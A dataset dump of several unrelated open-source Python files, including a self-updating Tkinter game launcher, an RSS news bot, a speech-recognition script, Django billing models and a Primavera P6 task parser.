ans['title']\n type_ = ans['type']\n\n htmlrepr = f\"\"\"\n
\n

{title}

\n by

{author}

\n type:{type_}\n Read more \n
\\n\n \"\"\"\n print(htmlrepr)\n html+=htmlrepr\n with open('api.html', 'a') as api:\n api.write(html)\n\nhtml.join(\"\")\nwith open('api.html', 'w') as api:\n api.write(html)\n# #print(urls)\n\n","repo_name":"Firebreather-heart/case-study","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21799188412","text":"import tkinter as tk\nimport urllib.request\nimport subprocess\nimport os\n\n## Update self\nprint(\"Updating launcher...\")\nlink = \"https://raw.githubusercontent.com/kjniemela/Skylands-WFA/master/launcher.py\"\nf = urllib.request.urlopen(link)\nnew_launcher = f.read()\nf.close()\n\nf = open(\"launcher.py\", \"wb\")\nf.write(new_launcher)\nf.close()\n\ntry:\n f = open(\"Skylands/version.txt\")\n cur_version = f.read()\n f.close()\nexcept FileNotFoundError:\n cur_version = None\n\n## Callbacks\ndef check():\n global update_window\n global button_install\n global button_cancel\n\n version_file_link = \"https://raw.githubusercontent.com/kjniemela/Skylands-WFA/master/version.txt\"\n f = urllib.request.urlopen(version_file_link)\n new_version = f.read().decode()\n f.close()\n print(\"Current Version:\", cur_version)\n print(\"Latest Version:\", new_version)\n\n update_window = tk.Toplevel()\n update_window.title(\"Check for updates\")\n update_window.minsize(width=400, height=100)\n\n if new_version == cur_version:\n message = \"You are running the latest version of Skylands WFA (%s).\" % (cur_version)\n elif cur_version == None:\n message = \"Skylands WFA is currently not installed on your device. Do you want to download and install the latest version (%s)?\" % (new_version)\n else:\n message = \"You are running Skylands WFA (%s). A new version (%s) is available. Do you want to download and install it?\" % (cur_version, new_version)\n\n msg = tk.Message(update_window, text=message, font=(\"Helvetica\", 11))\n msg.pack(padx=12, pady=12)\n\n if new_version == cur_version:\n button = tk.Button(update_window, text=\"Ok\", command=update_window.destroy)\n button.pack()\n else:\n button_install = tk.Button(update_window, text=\"Install\", command=install_latest)\n button_install.pack()\n\n button_cancel = tk.Button(update_window, text=\"Cancel\", command=update_window.destroy)\n button_cancel.pack()\n\ndef install_latest():\n global update_window\n global button_install\n global button_cancel\n global cur_version\n\n button_install.config(state=tk.DISABLED)\n button_cancel.config(state=tk.DISABLED)\n\n filepaths_link = \"https://raw.githubusercontent.com/kjniemela/Skylands-WFA/master/filepaths\"\n f = urllib.request.urlopen(filepaths_link)\n filepaths = f.read().decode().split(\"\\n\")\n f.close()\n\n if not os.path.exists(\"Skylands\"):\n os.mkdir(\"Skylands\")\n\n i = 0\n for filepath in filepaths:\n link = \"https://raw.githubusercontent.com/kjniemela/Skylands-WFA/master/\" + filepath\n link = link.replace(\" \", \"%20\")\n f = urllib.request.urlopen(link)\n data = f.read()\n f.close()\n\n dir_name = \"/\".join(filepath.split(\"/\")[:-1])\n print(\"Downloading\", filepath)\n if not dir_name == \"\" and not os.path.exists(\"Skylands/\" + dir_name):\n os.makedirs(\"Skylands/\" + dir_name)\n\n f = open(\"Skylands/\" + filepath, \"wb\")\n f.write(data)\n f.close()\n\n\n update_window.title(\"Installing... %d\" % (round((i / len(filepaths)) * 100)) + \"%\")\n master.update()\n i += 1\n\n f = open(\"Skylands/version.txt\")\n cur_version = f.read()\n f.close()\n\n launch_btn.config(state=tk.NORMAL)\n launch_btn.config(text=\"Launch Skylands WFA v%s\" % (cur_version))\n\n top = tk.Toplevel(update_window)\n top.title(\"Install successful\")\n top.resizable(False, False)\n \n msg = tk.Message(top, text=\"Skylands WFA version %s installed successfully!\" % (cur_version), font=(\"Helvetica\", 11))\n msg.pack(padx=12, pady=12)\n\n button = tk.Button(top, text=\"Ok\", command=update_window.destroy)\n button.pack()\n\ndef launch(flags=[]):\n print(\"Launching Skylands WFA version\", cur_version)\n python_dir = \"/\".join(os.__file__.replace(\"\\\\\", \"/\").split(\"/\")[:-2])\n cmd = [python_dir + \"/pythonw\", \"main.py\"]\n cmd += flags\n print(cmd)\n subprocess.Popen(cmd, cwd=\"Skylands\")\n exit() ## TODO maybe use sys.exit? - or have the launcher continue in the background\n\ndef launch_debug():\n launch(flags=[\"-D\"])\n\ndef settings():\n print(\"SETTINGS\")\n\nmaster = tk.Tk()\nmaster.title('Skylands Launcher')\n\nupdate_window = None\nbutton_install = None\nbutton_cancel = None\n\ngreeting = tk.Label(master, text=\"Skylands WFA - Launcher\", font=(\"Helvetica\", 24))\ngreeting.pack(padx=48, pady=48)\n\nbtn_frame = tk.Frame(master)\nbtn_frame.pack()\n\ncheck_btn = tk.Button(btn_frame, text=\"Check for Updates\", command=check)\ncheck_btn.pack(side=tk.LEFT)\nlaunch_btn = tk.Button(\n btn_frame,\n text=\"Launch Skylands WFA\" + (\" v%s\" % (cur_version) if cur_version != None else \"\"),\n command=launch,\n state=tk.NORMAL if cur_version != None else tk.DISABLED\n)\nlaunch_btn.pack(side=tk.LEFT)\ndebug_btn = tk.Button(btn_frame, text=\"Launch in Debug Mode\", command=launch_debug)\ndebug_btn.pack(side=tk.LEFT)\nsettings_btn = tk.Button(btn_frame, text=\"Settings\", command=settings)\nsettings_btn.pack(side=tk.LEFT)\n\nmaster.mainloop()","repo_name":"kjniemela/Skylands-WFA","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":5003,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"28897829307","text":"# https://leetcode.com/problems/image-overlap/description/\n# https://leetcode.com/problems/image-overlap/solutions/130623/c-java-python-straight-forward/\n\nimport collections\n\n\n# TC:O(N^2), SC:O(N^2)\ndef largestOverlap(img1: List[List[int]], img2: List[List[int]]) -> int:\n # find same transform vector, (xi-xj, yi-yj), return max count is the max overlapping area\n # n = len(img1)\n non_zero1 = [(i, j) for i in range(len(img1)) for j in range(len(img1[0])) if img1[i][j] != 0]\n non_zero2 = [(i, j) for i in range(len(img2)) for j in range(len(img2[0])) if img2[i][j] != 0]\n counter = collections.Counter((xi - xj, yi - yj) for (xi, yi) in non_zero1 for (xj, yj) in non_zero2)\n return max(counter.values()) if len(counter) != 0 else 0","repo_name":"ychanc2104/LeetCode","sub_path":"Image Overlap.py","file_name":"Image Overlap.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12335663437","text":"#!/usr/bin/env python3\n\nfrom config import Config\nfrom bot import Bot\n\nimport asyncio\nimport feedparser\n\n\ndef get_rss_news(url: str, existing_links: list) -> str:\n news = []\n new_links = []\n data = feedparser.parse(url)\n feed_title = data.feed[\"title\"]\n\n for entry in data.entries:\n title = entry[\"title\"]\n link_key = \"link\"\n\n # Some news feeds such as Hacker News, I'd prefer to have the link\n # to comments instead.\n\n if feed_title == \"Hacker News\":\n link_key = \"comments\"\n\n link = entry[link_key].replace(\"http://\", \"https://\")\n\n if link in existing_links:\n continue\n\n news.append(f\"{title}\\n{link}\")\n new_links.append(link)\n\n if len(news) <= 0:\n return None\n\n news.insert(0, feed_title)\n news.append(\"\\n\")\n\n return \"\\n\\n\".join(news)\n\n\ndef send_news(bot: Bot, config: Config):\n for news_item in config.get_news():\n room_id = config.get_room_id(news_item.get_room())\n news = get_rss_news(\n url=news_item.get_url(), existing_links=bot.get_room_links(room_id)\n )\n\n if news == None:\n continue\n\n bot.send_message(content=news, room_id=room_id)\n\n\nif __name__ == \"__main__\":\n config = Config()\n bot = Bot(config)\n\n try:\n send_news(bot=bot, config=config)\n finally:\n bot.close_client()\n","repo_name":"HuyNguyenAu/matrix-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71603193769","text":"#pip install pyaudio | pip install SpeechRecognition | pip install os_sys | https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyaudio -> pip install CaminhoDoArquivo \r\n\r\nimport speech_recognition as sr\r\nimport os\r\n\r\ndef ouvir_microfone():\r\n microfone = sr.Recognizer()\r\n\r\n with sr.Microphone() as source:\r\n microfone.adjust_for_ambient_noise(source)\r\n print(\"Diga alguma coisa: \")\r\n audio = microfone.listen(source)\r\n\r\n try:\r\n frase = microfone.recognize_google(audio,language=\"pt-BR\")\r\n print(\"Voce disse: \"+frase)\r\n\r\n if \"nagevador\" in frase:\r\n os.system(\"start Chorme.exe\")\r\n\r\n except sr.UnknownValueError:\r\n print(\"Não entedi\")\r\n return frase\r\n\r\nouvir_microfone()\r\n","repo_name":"kaiquesouzasantos/estudos-python","sub_path":"Scripts/Reconhecimento/ReconhecimentoDeVoz.py","file_name":"ReconhecimentoDeVoz.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31077345316","text":"import logging\nimport decimal\nfrom django.db import models\nfrom django.db.models import F, Sum\nfrom django.db.models.functions import Coalesce\nfrom django.utils.translation import ugettext_lazy as _\nfrom jsonfield import JSONField\n\nfrom fleio.billing.settings import CyclePeriods\nfrom .service import Service\nfrom .cart import FleioCart\nfrom .order import Order\nfrom .product import Product\nfrom .product_cycle import ProductCycle\n\nLOG = logging.getLogger(__name__)\n\n\nclass OrderItemTypes(object):\n service = 'service'\n serviceUpgrade = 'serviceUpgrade'\n credit = 'credit'\n other = 'other'\n\n CHOICES = ((service, _('Service')),\n (serviceUpgrade, _('Service Upgrade')),\n (credit, _('Credit Balance')),\n (other, _('Other')))\n\n def __contains__(self, item):\n return item in [c[0] for c in self.CHOICES]\n\n\nclass OrderItemQuerySet(models.QuerySet):\n def total_price(self):\n \"\"\"Total price for items with config options and taxes\"\"\"\n with_opts = self.annotate(config_options_total=Sum('configurable_options__price') +\n Sum('configurable_options__setup_fee'))\n return with_opts.aggregate(total=Sum(F('fixed_price') + F('setup_fee')) +\n Coalesce(Sum('config_options_total'), 0) +\n Coalesce(Sum('taxes__amount'), 0))['total']\n\n\nclass OrderItem(models.Model):\n cart = models.ForeignKey(FleioCart, related_name='items', null=True, blank=True, on_delete=models.CASCADE)\n order = models.ForeignKey(Order, related_name='items', null=True, blank=True, on_delete=models.CASCADE)\n item_type = models.CharField(choices=OrderItemTypes.CHOICES, db_index=True, max_length=16)\n product = models.ForeignKey(Product, null=True, blank=True, on_delete=models.CASCADE)\n cycle = models.ForeignKey(ProductCycle, null=True, blank=True, on_delete=models.CASCADE)\n service = models.ForeignKey(Service, related_name='order_item', null=True, blank=True, db_index=True,\n on_delete=models.SET_NULL)\n taxable = models.BooleanField(default=False)\n setup_fee = models.DecimalField(max_digits=12, decimal_places=2, default='0.00')\n fixed_price = models.DecimalField(max_digits=12, decimal_places=2, default='0.00')\n name = models.CharField(max_length=128, default='Product')\n description = models.CharField(max_length=255, default='')\n cycle_display = models.CharField(max_length=128, null=True, blank=True)\n plugin_data = JSONField(default={}, max_length=4096)\n quantity = models.PositiveIntegerField(default=1)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n domain_name = models.CharField(max_length=256, null=True, blank=True)\n domain_action = models.CharField(max_length=64, null=True, blank=True)\n\n objects = OrderItemQuerySet.as_manager()\n\n class Meta:\n ordering = ['-created_at']\n\n @property\n def currency(self):\n if self.cart:\n return self.cart.currency\n elif self.order:\n return self.order.currency\n else:\n return None\n\n @property\n def tax_amount(self):\n return self.taxes.aggregate(total=Sum('amount'))['total'] or decimal.Decimal('0.00')\n\n @property\n def setup_fees_total(self):\n return self.setup_fee + self.configurable_options_setup_fees\n\n @property\n def configurable_options_price(self):\n return self.configurable_options.aggregate(total=Sum('price'))['total'] or decimal.Decimal('0.00')\n\n @property\n def configurable_options_setup_fees(self):\n return self.configurable_options.aggregate(total=Coalesce(Sum('setup_fee'), 0))['total']\n\n @property\n def amount_without_taxes(self):\n return (self.fixed_price +\n self.setup_fee +\n self.configurable_options_price +\n self.configurable_options_setup_fees)\n\n @property\n def amount(self):\n amount = self.fixed_price + self.configurable_options_price\n amount += self.tax_amount\n if self.cycle and self.cycle.cycle == CyclePeriods.onetime:\n amount += self.setup_fee + self.configurable_options_setup_fees\n return amount\n\n def __str__(self):\n return '{} {}'.format(self.name, self.description or '')\n\n\nclass OrderItemTax(models.Model):\n cart_item = models.ForeignKey(OrderItem, related_name='taxes', on_delete=models.CASCADE)\n name = models.CharField(max_length=32, db_index=True)\n amount = models.DecimalField(max_digits=12, decimal_places=2)\n description = models.CharField(max_length=128, null=True, blank=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['-created_at']\n","repo_name":"pizzhub/backendfleio-test","sub_path":"project/fleio/billing/models/order_item.py","file_name":"order_item.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28048529100","text":"from datetime import datetime\n\nfrom xerparser.model.taskactvs import TaskActvs\n\nfrom xerparser.model.predecessors import Predecessors\nfrom xerparser.model.classes.calendar import Calendar\nfrom xerparser.model.activitiyresources import ActivityResources\nfrom xerparser.model.taskprocs import TaskProcs\nimport locale\n\nclass Task:\n obj_list = []\n\n def __init__(self, params, data):\n # Unique ID generated by the system.\n self.task_id = int(params.get('task_id')) if params.get('task_id') else None\n # project to which the activity belongs referenced by system generated unique id\n self.proj_id = int(params.get('proj_id')) if params.get('proj_id') else None\n # wbs element activity assigned to referenced by system unique id\n self.wbs_id = int(params.get('wbs_id')) if params.get('wbs_id') else None\n # calendar assigned to activity referenced by system unique id\n self.clndr_id = int(params.get('clndr_id')) if params.get('clndr_id') else None\n # The physical percent complete can either be user entered or calculated from the activity's weighted steps.\n # There is a project setting specifying this.\n self.phys_complete_pct = locale.atof(params.get('phys_complete_pct')) if 'phys_complete_pct' in params.keys() else None\n # Indicates that the primary resource has sent feedback notes about this activity which have not been\n # reviewed yet.\n self.rev_fdbk_flag = params.get('rev_fdbk_flag') if params.get('rev_fdbk_flag') else None\n # The estimation weight for the activity, used for top-down estimation. Top-down estimation weights are used\n # to calculate the proportion of units that each activity receives in relation to the other activities within\n # the same WBS. Top-down estimation distributes estimated units in a top-down manner to activities using the\n # WBS hierarchy.\n\n self.est_wt = locale.atof(params.get('est_wt').strip()) if 'est_wt' in params.keys() else None\n # Indicates that the planned labor and nonlabor units for the activity will not be modified by top-down\n # estimation.\n self.lock_plan_flag = params.get('lock_plan_flag') if params.get('lock_plan_flag') else None\n # Identifies whether the actual and remaining cost for the expense are computed automatically using the\n # planned cost and the activity's schedule percent complete. If this option is selected,\n # the actual/remaining cost are automatically updated when project actuals are applied. This assumes the\n # expenses are made according to plan.\n self.auto_compute_act_flag = params.get('auto_compute_act_flag') if params.get('auto_compute_act_flag') else None\n # The activity percent complete type is one of \"\"Duration\"\", \"\"Units\"\", or \"\"Physical\"\". The percent complete\n # type controls whether the Activity % Complete is tied to the Duration % Complete, the Units % Complete,\n # or the Physical % Complete for the activity. Set the percent complete type to \"\"Duration\"\" for activities\n # which are duration driven, for example, administration tasks and training classes. Set the percent\n # complete type to \"\"Physical\"\" for activities which are work-product driven, for example, creating a\n # document or a product. Set the percent complete type to \"\"Units\"\" for activities which are work effort\n # driven, for example, providing a consulting service.\n self.complete_pct_type = params.get('complete_pct_type').strip() if params.get('complete_pct_type') else None\n # The type of activity, either 'Task Dependent', 'Resource Dependent', 'Level of Effort', 'Start Milestone'\n # or 'Finish Milestone'. A Task Dependent activity is scheduled using the activity's calendar rather than\n # the calendars of the assigned resources. A Resource Dependent activity is scheduled using the calendars of\n # the assigned resources. This type is used when several resources are assigned to the activity,\n # but they may work separately. A Start/Finish Milestone is a zero-duration activity, marking a significant\n # start/end of project event. A Level of Effort activity has a duration which is determined by its dependent\n # activities. Administration-type activities are typically level of effort.\n self.task_type = params.get('task_type').strip() if params.get('task_type') else None\n # The duration type of the activity. One of \"\"Fixed Units per Time\"\", \"\"Fixed Duration\"\", or \"\"Fixed Units\"\".\n # For Fixed Units per Time activities, the resource units per time are constant when the activity duration\n # or units are changed. This type is used when an activity has fixed resources with fixed productivity\n # output per time period. For Fixed Duration activities, the activity duration is constant as the units or\n # resource units per time are changed. This type is used when the activity is to be completed within a fixed\n # time period regardless of the resources assigned. For Fixed Units activities, the activity units are\n # constant when the duration or resource units per time are changed. This type is used when the total amount\n # of work is fixed, and increasing the resources can decrease the activity duration.\n self.duration_type = params.get('duration_type').strip() if params.get('duration_type') else None\n # The current status of the activity, either Not Started, In Progress, or Completed.\n self.status_code = params.get('status_code').strip() if params.get('status_code') else None\n # A short ID which uniquely identifies the activity within the project.\n self.task_code = params.get('task_code').strip() if params.get('task_code') else None\n # The name of the activity. The activity name does not have to be unique.\n self.task_name = params.get('task_name').strip() if params.get('task_name') else None\n # Resource ID Name\n self.rsrc_id = int(params.get('rsrc_id').strip()) if params.get('rsrc_id') else None\n # The amount of time the wbs can be delayed before delaying the project finish date. Total int can be\n # computed as Late Start - Early Start or as Late Finish - Early Finish; this option can be set when running\n # the project scheduler.\n self.total_float_hr_cnt = locale.atof(params.get('total_float_hr_cnt').strip()) if params.get('total_float_hr_cnt') and \\\n params.get('total_float_hr_cnt') != '' else None\n # The amount of time the activity can be delayed before delaying the start date of any successor activity.\n self.free_float_hr_cnt = locale.atof(params.get('free_float_hr_cnt')) if params.get('free_float_hr_cnt') else None\n # Remaining duration is the total working time from the activity remaining start date to the remaining finish\n # date. The remaining working time is computed using the activity's calendar. Before the activity is\n # started, the remaining duration is the same as the Original Duration. After the activity is completed the\n # remaining duration is zero.\n self.remain_drtn_hr_cnt = locale.atof(params.get('remain_drtn_hr_cnt').strip()) if params.get('remain_drtn_hr_cnt') else 0\n # The total actual labor units for all child activities\n self.act_work_qty = locale.atof(params.get('act_work_qty')) if params.get('act_work_qty') else None\n # The remaining units for all labor resources assigned to the activity. The remaining units reflects the work\n # remaining to be done for the activity. Before the activity is started, the remaining units are the same as\n # the planned units. After the activity is completed, the remaining units are zero.\n self.remain_work_qty = locale.atof(params.get('remain_work_qty')) if params.get('remain_work_qty') else None\n # The planned units for all labor resources assigned to the activity.\n self.target_work_qty = locale.atof(params.get('target_work_qty')) if params.get('target_work_qty') else None\n # Original Duration is the planned working time for the resource assignment on the activity,\n # from the resource's planned start date to the planned finish date. The planned working time is computed\n # using the calendar determined by the Activity Type. Resource Dependent activities use the resource's\n # calendar; other activity types use the activity's calendar. This is the duration that Timesheets users\n # follow and the schedule variance is measured against.\n self.target_drtn_hr_cnt = locale.atof(params.get('target_drtn_hr_cnt').strip()) if params.get('target_drtn_hr_cnt') else None\n # The planned units for all nonlabor resources assigned to the activity.\n self.target_equip_qty = locale.atof(params.get('target_equip_qty')) if params.get('target_equip_qty') else None\n # The actual units for all nonlabor resources assigned to the activities under the WBS.\n self.act_equip_qty = locale.atof(params.get('act_equip_qty')) if params.get('act_equip_qty') else None\n # The remaining units for all nonlabor resources assigned to the activity. The remaining units reflects the\n # work remaining to be done for the activity. Before the activity is started, the remaining units are the\n # same as the planned units. After the activity is completed, the remaining units are zero.\n self.remain_equip_qty = locale.atof(params.get('remain_equip_qty')) if params.get('remain_equip_qty') else None\n # The constraint date for the activity, if the activity has a constraint. The activity's constraint type\n # determines whether this is a start date or finish date. Activity constraints are used by the project\n # scheduler.\n self.cstr_date = datetime.strptime(params.get('cstr_date'), '%Y-%m-%d %H:%M') if params.get('cstr_date') else None\n # The date on which the activity is actually started.\n self.act_start_date = datetime.strptime(params.get('act_start_date'), '%Y-%m-%d %H:%M') if params.get('act_start_date') else None\n # The date on which the activity is actually finished.\n self.act_end_date = datetime.strptime(params.get('act_end_date'), '%Y-%m-%d %H:%M') if params.get('act_end_date') else None\n # the activity late start date\n self.late_start_date = datetime.strptime(params.get('late_start_date'), '%Y-%m-%d %H:%M') if params.get('late_start_date') else None\n # The latest possible date the activity must finish without delaying the project finish date. This date is\n # computed by the project scheduler based on network logic, schedule constraints, and resource availability.\n self.late_end_date = datetime.strptime(params.get('late_end_date'), '%Y-%m-%d %H:%M') if params.get('late_end_date') else None\n # The date the activity is expected to be finished according to the progress made on the activity's work\n # products. The expected finish date is entered manually by people familiar with progress of the activity's\n # work products.\n self.expect_end_date = datetime.strptime(params.get('expect_end_date'), '%Y-%m-%d %H:%M') if params.get('expect_end_date') else None\n # The earliest possible date the remaining work for the activity can begin. This date is computed by the\n # project scheduler based on network logic, schedule constraints, and resource availability.\n self.early_start_date = datetime.strptime(params.get('early_start_date'), '%Y-%m-%d %H:%M') if params.get('early_start_date') else None\n # The earliest possible date the activity can finish. This date is computed by the project scheduler based on\n # network logic, schedule constraints, and resource availability.\n self.early_end_date = datetime.strptime(params.get('early_end_date'), '%Y-%m-%d %H:%M') if params.get('early_end_date') else None\n # The date the remaining work for the activity is scheduled to begin. This date is computed by the project\n # scheduler but can be updated manually by the project manager. Before the activity is started,\n # the remaining start date is the same as the planned start date. This is the start date that Timesheets\n # users follow.\n self.restart_date = datetime.strptime(params.get('restart_date'), '%Y-%m-%d %H:%M') if params.get('restart_date') else None\n # The date the remaining work for the activity is scheduled to finish. This date is computed by the project\n # scheduler but can be updated manually by the project manager. Before the activity is started, the remaining\n # finish date is the same as the planned finish date. This is the finish date that Timesheets users follow.\n self.reend_date = datetime.strptime(params.get('reend_date'), '%Y-%m-%d %H:%M') if params.get('reend_date') else None\n # The date the activity is scheduled to begin. This date is computed by the project scheduler but can be\n # updated manually by the project manager. This date is not changed by the project scheduler after the\n # activity has been started.\n self.target_start_date = datetime.strptime(params.get('target_start_date'), '%Y-%m-%d %H:%M') if params.get('target_start_date') else None\n # The date the activity is scheduled to finish. This date is computed by the project scheduler but can be\n # updated manually by the project manager. This date is not changed by the project scheduler after the\n # activity has been started.\n self.target_end_date = datetime.strptime(params.get('target_end_date'), '%Y-%m-%d %H:%M') if params.get('target_end_date') else None\n # Remaining late start date is calculated by the scheduler.\n self.rem_late_start_date = datetime.strptime(params.get('rem_late_start_date'), '%Y-%m-%d %H:%M') if params.get('rem_late_start_date') else None\n # Remaining late end date is calculated by the scheduler.\n self.rem_late_end_date = datetime.strptime(params.get('rem_late_end_date'), '%Y-%m-%d %H:%M') if params.get('rem_late_end_date') else None\n # The type of constraint applied to the activity start or finish date. Activity constraints are used by the\n # project scheduler. Start date constraints are 'Start On', 'Start On or Before', 'Start On or After' and\n # 'Mandatory Start'. Finish date constraints are 'Finish On', 'Finish On or Before', 'Finish On or After'\n # and 'Mandatory Finish'. Another type of constraint, 'As Late as Possible', schedules the activity as late\n # as possible based on the available free int.\n self.cstr_type = params.get('cstr_type').strip() if params.get('cstr_type') else None\n self.priority_type = params.get('priority_type').strip() if params.get('priority_type') else None\n # The date progress is suspended on an activity.\n self.suspend_date = datetime.strptime(params.get('suspend_date').strip(), '%Y-%m-%d %H:%M') if params.get('suspend_date') else None\n # The date progress is resumed on an activity.\n self.resume_date = datetime.strptime(params.get('resume_date').strip(), '%Y-%m-%d %H:%M') if params.get('resume_date') else None\n self.int_path = params.get('int_path').strip() if params.get('int_path') else None\n # This field is computed by the project scheduler and identifies the order in which the activities were\n # processed within the int path.\n self.int_path_order = params.get('int_path_order').strip() if params.get('int_path_order') else None\n self.guid = params.get('guid').strip() if params.get('guid') else None\n self.tmpl_guid = params.get('tmpl_guid').strip() if params.get('tmpl_guid') else None\n # The second constraint date for the activity, if the activity has a constraint.\n self.cstr_date2 = datetime.strptime(params.get('cstr_date2'), '%Y-%m-%d %H:%M') if params.get('cstr_date2') else None\n # The second type of constraint applied to the activity start or finish date.\n self.cstr_type2 = params.get('cstr_type2').strip() if params.get('cstr_type2') else None\n self.driving_path_flag = params.get('driving_path_flag') if params.get('driving_path_flag') else None\n # The actual this period units for all labor resources assigned to the activity.\n self.act_this_per_work_qty = locale.atof(params.get('act_this_per_work_qty')) if params.get('act_this_per_work_qty') else None\n # The actual this period units for all nonlabor resources assigned to the activity.\n self.act_this_per_equip_qty = locale.atof(params.get('act_this_per_equip_qty')) if params.get('act_this_per_equip_qty') else None\n # The External Early Start date is the date the external relationship was scheduled to finish. This date may\n # be used to calculate the start date of the current activity during scheduling. This field is populated on\n # import when an external relationship is lost.\n try:\n self.external_early_start_date = datetime.strptime(params.get('external_early_start_date').strip(), '%Y-%m-%d %H:%M') if params.get('external_early_start_date') else None\n self.external_late_end_date = datetime.strptime(params.get('external_late_end_date'), '%Y-%m-%d %H:%M') if params.get('external_late_end_date') else None\n except:\n pass\n self.create_date = datetime.strptime(params.get('create_date'), '%Y-%m-%d %H:%M') if params.get('create_date') else None\n self.update_date = datetime.strptime(params.get('update_date'), '%Y-%m-%d %H:%M') if params.get('update_date') else None\n self.create_user = params.get('create_user').strip() if params.get('create_user') else None\n self.update_user = params.get('update_user').strip() if params.get('update_user') else None\n self.location_id = params.get('location_id').strip() if params.get('location_id') else None\n self.calendar = Calendar.find_by_id(self.clndr_id)\n # self.wbs = WBS.find_by_id(int(self.wbs_id) if self.wbs_id else None)\n # Task.obj_list.append(self)\n self.data = data\n\n def get_tsv(self):\n tsv = ['%R', self.task_id, self.proj_id, self.wbs_id, self.clndr_id, self.phys_complete_pct, self.rev_fdbk_flag,\n self.est_wt, self.lock_plan_flag, self.auto_compute_act_flag, self.complete_pct_type, self.task_type,\n self.duration_type, self.status_code, self.task_code, self.task_name, self.rsrc_id,\n self.total_float_hr_cnt, self.free_float_hr_cnt, self.remain_drtn_hr_cnt, self.act_work_qty,\n self.remain_work_qty, self.target_work_qty, self.target_drtn_hr_cnt, self.target_equip_qty,\n self.act_equip_qty, self.remain_equip_qty,\n self.cstr_date.strftime('%Y-%m-%d %H:%M') if self.cstr_date else None,\n self.act_start_date.strftime('%Y-%m-%d %H:%M') if self.act_start_date else None,\n self.act_end_date.strftime('%Y-%m-%d %H:%M') if self.act_end_date else None,\n self.late_start_date.strftime('%Y-%m-%d %H:%M') if self.late_start_date else None,\n self.late_end_date.strftime('%Y-%m-%d %H:%M') if self.late_end_date else None,\n self.expect_end_date.strftime('%Y-%m-%d %H:%M') if self.expect_end_date else None,\n self.early_start_date.strftime('%Y-%m-%d %H:%M') if self.early_start_date else None,\n self.early_end_date.strftime('%Y-%m-%d %H:%M') if self.early_end_date else None,\n self.restart_date.strftime('%Y-%m-%d %H:%M') if self.restart_date else None,\n self.reend_date.strftime('%Y-%m-%d %H:%M') if self.reend_date else None,\n self.target_start_date.strftime('%Y-%m-%d %H:%M') if self.target_start_date else None,\n self.target_end_date.strftime('%Y-%m-%d %H:%M') if self.target_end_date else None,\n self.rem_late_start_date.strftime('%Y-%m-%d %H:%M') if self.rem_late_start_date else None,\n self.rem_late_end_date.strftime('%Y-%m-%d %H:%M') if self.rem_late_end_date else None,\n self.cstr_type, self.priority_type,\n self.suspend_date.strftime('%Y-%m-%d %H:%M') if self.suspend_date else None,\n self.resume_date.strftime('%Y-%m-%d %H:%M') if self.resume_date else None,\n self.int_path, self.int_path_order, self.guid, self.tmpl_guid,\n self.cstr_date2.strftime('%Y-%m-%d %H:%M') if self.cstr_date2 else None,\n self.cstr_type2, self.driving_path_flag,\n self.act_this_per_work_qty, self.act_this_per_equip_qty,\n self.external_early_start_date.strftime('%Y-%m-%d %H:%M') if self.external_early_start_date else None,\n self.external_late_end_date.strftime('%Y-%m-%d %H:%M') if self.external_late_end_date else None,\n self.create_date.strftime('%Y-%m-%d %H:%M') if self.create_date else None,\n self.update_date.strftime('%Y-%m-%d %H:%M') if self.update_date else None,\n self.create_user, self.update_user, self.location_id]\n return tsv\n\n @property\n def id(self):\n return self.task_id\n\n @property\n def totalint(self):\n if self.total_int_hr_cnt:\n tf = int(self.total_int_hr_cnt)/8.0\n else:\n return None\n return tf\n\n @property\n def resources(self):\n return self.data.taskresource.find_by_activity_id(self.task_id)\n\n @property\n def steps(self):\n return TaskProcs.find_by_activity_id(self.task_id)\n\n @property\n def activitycodes(self):\n return self .data.taskactvcodes.find_by_activity_id(self.task_id)\n\n\n @property\n def duration(self):\n dur = None\n if self.target_drtn_hr_cnt:\n if self.calendar.day_hr_cnt:\n dur = self.target_drtn_hr_cnt / self.calendar.day_hr_cnt\n else:\n dur = self.target_drtn_hr_cnt / 8.0\n else:\n dur =0.0\n return dur\n\n @property\n def constraints(self):\n if self.cstr_type == None or self.cstr_date == None:\n return None\n return {\"ConstraintType\": self.cstr_type,\n \"ConstrintDate\": self.cstr_date\n }\n\n @property\n def start_date(self):\n if self.act_start_date:\n return self.act_start_date\n else:\n return self.target_start_date\n\n @property\n def end_date(self):\n if self.act_end_date:\n return self.act_end_date\n else:\n return self.target_end_date\n\n @property\n def successors(self):\n suss = self.data.predecessors.get_successors(self.task_id)\n return suss\n\n @property\n def predecessors(self):\n return self.data.predecessors.get_predecessors(self.task_id)\n\n @classmethod\n def find_by_wbs_id(cls, wbs_id):\n return [v for v in cls.obj_list if v.wbs_id == wbs_id]\n\n def __repr__(self):\n return self.task_code\n\n\n","repo_name":"HassanEmam/PyP6Xer","sub_path":"xerparser/model/classes/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":23201,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"33156691218","text":"\"\"\"Energies resources\"\"\"\n\nfrom flask.views import MethodView\n\nfrom bemserver_core.model import Energy\n\nfrom bemserver_api import Blueprint\n\nfrom .schemas import EnergySchema\n\n\nblp = Blueprint(\n \"Energy\",\n __name__,\n url_prefix=\"/energies\",\n description=\"Operations on energies\",\n)\n\n\n@blp.route(\"/\")\nclass EnergyViews(MethodView):\n @blp.login_required\n @blp.etag\n 